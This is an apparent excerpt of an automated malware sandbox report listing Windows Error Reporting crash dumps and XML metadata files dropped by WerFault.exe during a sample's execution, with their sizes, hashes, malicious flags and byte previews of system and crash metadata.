                  SSDEEP:192:QSuV8avvPZT0rKq503jJwwZrtKdFmzuiFbZ24IO8ThB:kVdvBArKqujomzuiFbY4IO8L
                  MD5:517461F2489B5650A5D43003AF46B48C
                  SHA1:83A7E8B02D24CBD793820A71CA6B2A9EF87A4015
                  SHA-256:D88A364B1D8C1E35BC45FC71E9C93E1A3D2F880DC950F455526EB0410D4F059C
                  SHA-512:99ABA809B73A219A1A667906B093B5B3C1B438C02A3EB890278F253E2A97C55A942F9B8A54675C1278342A9654E7E722ABF7D58B2330808D1D94C958333ABEDB
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.8.9.8.9.7.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.9.7.0.8.5.3.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.6.c.b.f.f.3.-.9.0.e.2.-.4.7.0.2.-.a.b.6.d.-.8.d.6.4.0.7.a.8.a.c.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.e.e.4.0.8.9.-.f.0.c.9.-.4.5.a.a.-.8.8.d.4.-.6.c.6.3.4.3.b.3.0.5.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER190F.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:36:02 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):59136
                  Entropy (8bit):1.9086051912701356
                  Encrypted:false
                  SSDEEP:192:mmMINbXWSZhiOrF5MOWY95+F+RCn6UuBZkOITSG9gwiX7knMjH:9MzSZrrzz5K+Yn6vBCOWgws7z
                  MD5:868CA210F8E704DF74512A1A8C956F2F
                  SHA1:70D719E23E493CDABFB33968911F637920755675
                  SHA-256:D4328450B46F43315509CC3A9329D3D9D67B200F8FC00E45209E9BCA4490482B
                  SHA-512:9CDE2F5D57122E3B9DAAC49C81C832F4E34CE9139B61F20FBD7ECA2C914AE9B519037D097748930355BF6F4E47E756E58C0FFE45B0FCC59CF9C2D81179C47493
                  Malicious:false
                  Preview:MDMP..a..... .......b..f............$...............,...........,,..........T.......8...........T...........x...............(...........................................................................................eJ..............GenuineIntel............T...........`..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER196D.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6328
                  Entropy (8bit):3.722917700266873
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJRO6IHyOpyYXrpBP89bzMsfOxm:R6lXJ46IHyNYXkzffp
                  MD5:2C61EAD73EECE95089BD834F76A26045
                  SHA1:877FE9E171BAAD38759B9033960D467771EFAAFC
                  SHA-256:049E0C702CA428710108D28710454CEE9492FF437375B62BCBD96F62BE141B18
                  SHA-512:F7793BF296171D1D15B94DAF448E71D539A9F602177A270D50D193F53BD94F2CEE5D91EA758C7CE53CD5E465A7C694B507A8BC3453D40DB302BA6FDC360B98C1
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER198E.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4599
                  Entropy (8bit):4.4730411718002445
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsMJg77aI9ZCjWpW8VYSYm8M4J00FN+q8Z/1CBHIcd:uIjfKI7+S7V2Jde1CVIcd
                  MD5:D8EC0B8B476265F29C36A4CB00C94AD0
                  SHA1:18E0F5108868EC3FD3429BBD8F133C50887EE790
                  SHA-256:7AA0D4F672D01EF30D4D7147493F11954CBEBA51F620467D95A47FADA2F73816
                  SHA-512:D17EA560D784D1D6BB8DA43CF2271DFDABD2282CC52BC37EB75C24FF2C9C805263184394E6C0025422C9955783534546BE33C708C1B1F85FAAF2EA046946B62A
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405038" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B31.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:36:02 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):61824
                  Entropy (8bit):1.9844107707796004
                  Encrypted:false
                  SSDEEP:192:mTqNbXWSZ0tOr0hU5/w6W19BLu6MQGRCn6UuBZkOITSq94zXz7hy:8dSZfr0g/Qa7Yn6vBCOK4jz9
                  MD5:474BF31930E8414BAA765A4CF493B9A2
                  SHA1:5E6799EE8895F0CA115C78E5211102A349A2629F
                  SHA-256:DADEB8D7C4DBF27D6F3B1D06B93A05A05070D05C1899C681B65A0C78C297E278
                  SHA-512:31EEEC37A29906400D6E6D555E60546F9E09A0C7B725A5D52D80EEB8FEDC646A42A9EEF10BCE7D223E871053D525277012B6E6BF6D51BDA1FB1F086E70E7EBD6
                  Malicious:false
                  Preview:MDMP..a..... .......b..f............$...............,...........,,..........T.......8...........T...........x...............(...........................................................................................eJ..............GenuineIntel............T...........`..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B81.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6342
                  Entropy (8bit):3.7262497764271845
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJRI6IHyjbBYXrpB789bzMsftxm:R6lXJ+6IHyJYXozffS
                  MD5:C1B9A14BD6E869292DE6550C59BA20B7
                  SHA1:2C478334BA5CE9CA4321145BFCF559493ED830D4
                  SHA-256:7CFE91D1195A9E80F49C8D22D583C89256B7268E14196EC11CE457FB535A7D5A
                  SHA-512:91DFE45551045781D7E325DC75A91CB2DDDB91DA3BE5E2A7E30EF93211BDDEFFDD8F2212C835E04BF930B78226D4665D7592D09C454EFDC61A2E17B7110013BD
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BB0.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4599
                  Entropy (8bit):4.473059239044667
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsMJg77aI9ZCjWpW8VYnoYm8M4J00FobTmT+q8Z/1CBHIcd:uIjfKI7+S7VcFJyTie1CVIcd
                  MD5:A9DCF24734E11194C9936ECBEC2F2046
                  SHA1:37040DCACACE6F9029D0D2A7D409E87EABAF3F92
                  SHA-256:FD4516CC8B25FB173845C5CB3BC19ADE13DC900956957BC79064565271AEE7C8
                  SHA-512:8A90230969002DB11A83E15C507C732F49301A2D3D42D97C7D592EE18585F67CAD7E0971AE4FCADFC4FD01A80E5F6718772F46487BF6CD68B92671301703C814
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405038" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D45.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:36:03 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):66222
                  Entropy (8bit):2.13496635854332
                  Encrypted:false
                  SSDEEP:384:rnMzr2Lauk7VYflbJ7t4K7kien6vBCezj+rDc:rMzr+dbJt06vBQrDc
                  MD5:CEEBDC815EAC2D73C133D47F76A9C4FD
                  SHA1:E6C85E22E9BA7426A48BBF25353B38F3F0F5605E
                  SHA-256:6D624FEFE961F884AAB2734C6022420E372E4755C318BFC2C38C954BD144CD19
                  SHA-512:328B24605CC52043B3EBA1501407865FA49DA102BB79A678CAD3C825A9CF76963232F81E3C89C5E10C32FF648EE35C657B9B86FA3B8C63F049765C7C5EE33C05
                  Malicious:false
                  Preview:MDMP..a..... .......c..f............$...............,...........<-..........T.......8...........T.......................................................................................................................eJ..............GenuineIntel............T...........`..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DA3.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6342
                  Entropy (8bit):3.7258305499339985
                  Encrypted:false
                  SSDEEP:96:RSIU6o7wVetbR+6My+XPxYBxFXYED5aMOU7x89bqMsfxum:R6l7wVeJR+6MFZYXrpB7x89bqMsfxum
                  MD5:ED41344ADFAADB4B250923A10FF002E2
                  SHA1:6CB66580286A6F7B5A53E6E9EF1E19347F4A31D8
                  SHA-256:A2073A0BD5556508044580748DBFC30BC107BD4C917676FC16CDB405BF08F4F5
                  SHA-512:C26ED8C85518AB7C0E09B1EBB4680424BBEDB66F94D4C242E954B9E288CFDBEFBD4C155E4A89F37B887ABDC832BE39CA584119A67DB15B147042BCA4FFBEB707
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DC4.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4599
                  Entropy (8bit):4.475543969206694
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsMJg77aI9ZCjWpW8VYhYm8M4J00FiJ+q8Z/1CBHIcd:uIjfKI7+S7VVJse1CVIcd
                  MD5:4759A446D451DB4B65BBFEF1622F7732
                  SHA1:DA95EF18EEB35568E7A1650EC8BA81846F32CE6B
                  SHA-256:0B873743861831038EA2D9F75EEEEF3F036DA9552E89384699D572D8BC80F75D
                  SHA-512:331CDBC40277057F3548241BA0CD121EF9BFBBB8E111457F784CA3916E4FDD7BD31073CD0DD5481FA9AE17393456F6F8C79EE4B45CBB7358A0546AF8CE6AC71C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405038" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER277B.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:00 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):52392
                  Entropy (8bit):2.200574141196255
                  Encrypted:false
                  SSDEEP:192:hk0BIYzX+TagkJtktOvP+TjJg3XBqQZFLzYa1X9UXeZ9ntHSsB9gCdOJ6utlY:q1TagkDvMJoqQ/tfUXeZ9nd/jXwJ/
                  MD5:A65593DDD06D2DB3E3B7B728EAB84C2C
                  SHA1:4ED461B88A0E975938944CB3A598093C462F3CF4
                  SHA-256:AC9EC715F24750C1B024F20CFE7B5A458E696B70C7203A6E5B5854A76C2CAC74
                  SHA-512:34AE1168FCC0A0238CB8EDBAAD7E3284B6BAA717848E05F9F535769A95DB8E3254F241D0AA75318FA216FFDDA603B590637527FE6F0BC9DDE1E6636D11022178
                  Malicious:false
                  Preview:MDMP..a..... .......$..f....................................<................+..........`.......8...........T.......................................................................................................................eJ......`.......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2808.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6967496771542234
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCl6r6Y2DoSUs/gmfBTrpBH89bSHsfaZGm:R6lXJY6r6YFSUMgmflMSMfy
                  MD5:3FADE6E8D3DC2433D1B3A9CCAAF67CDB
                  SHA1:5420A540C4862332C5C1FB66824DEACAE3A7F8A0
                  SHA-256:C6996D3B3510E36300223F886760247E098ACCD2F303DF3A04A3CEF43282F103
                  SHA-512:F1C13D6259A46715AA65D98A60E5C91C2B3BDFC65FDFF712125683D082A8FDF24BC9E9B80A992C5D5F1FFC3481F68B66EB87CC7C37749B3284A643A6BC314A41
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2829.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.4634257767930325
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYUYm8M4J40F+G+q8xDPsJLYhsd:uIjfLI7+S7V8JNGPsFYhsd
                  MD5:15B11DE01D40A57F0392689663E2C564
                  SHA1:03848D696B2C841B7421407BB5C47195EBC1D648
                  SHA-256:5561674660ABCCDB98A6E18C9AC109D72F3199D3A165B130EB6EEECD2B236D10
                  SHA-512:172BA67B182226CF3FC989BD31930B850379D452B3F073527D761AA271F0DA89244089199A1DC4A0476BE1E847FD7013D628779697F4C28DB5DC2184A176FFAE
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER29FB.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:00 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):64412
                  Entropy (8bit):2.2725246122385885
                  Encrypted:false
                  SSDEEP:384:TJ8Sf4jHQvp+Q4MjnNTAv5cBtfUXeZ9ndj4eyPE:TFwrQvpYMjNTiGNUXudfy8
                  MD5:8741B303AF7BBBFC2861F861465AC961
                  SHA1:B882F091A40B57A7BB3B935FA269C85562B52868
                  SHA-256:A9DAC4C3B0FB574851E7A771D293F5C8588F2E01543FFB78CE5B889E7A83C912
                  SHA-512:6E3A8A504E144B7B534F3F0EC95A46E3BADCE5B18CC3A189C327F3AEC92FA6E1FFD1B338C3603465D30D79459A4164A855C00001935D067A4C78AFF2647EF351
                  Malicious:false
                  Preview:MDMP..a..... .......$..f....................................<................0..........`.......8...........T...........................P...........<...............................................................................eJ..............GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A89.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6979591474134494
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCY6k/46Y2D5SUs/gmfBTrpBRC89bSHsfWGm:R6lXJl6j6Y0SUMgmflN7SMf+
                  MD5:76F39AEF1EAA83C30B1B289274536174
                  SHA1:24AD2A05DF356F49DAAB3DA59CB51405250A957A
                  SHA-256:8DDE8A6C229627E6C98934F14A46B87362DE371BECB2F2A9794A529BF3315CBC
                  SHA-512:C6C55D14692BA04147C19F54C3518AC6BEFCB4EFD5C62C0F9276E4C0A64BC2F8FB1042374A46DE94CB26DE6A6B34B845B44617A21F4627FA2A3D9F3EE9463CD7
                  Malicious:false
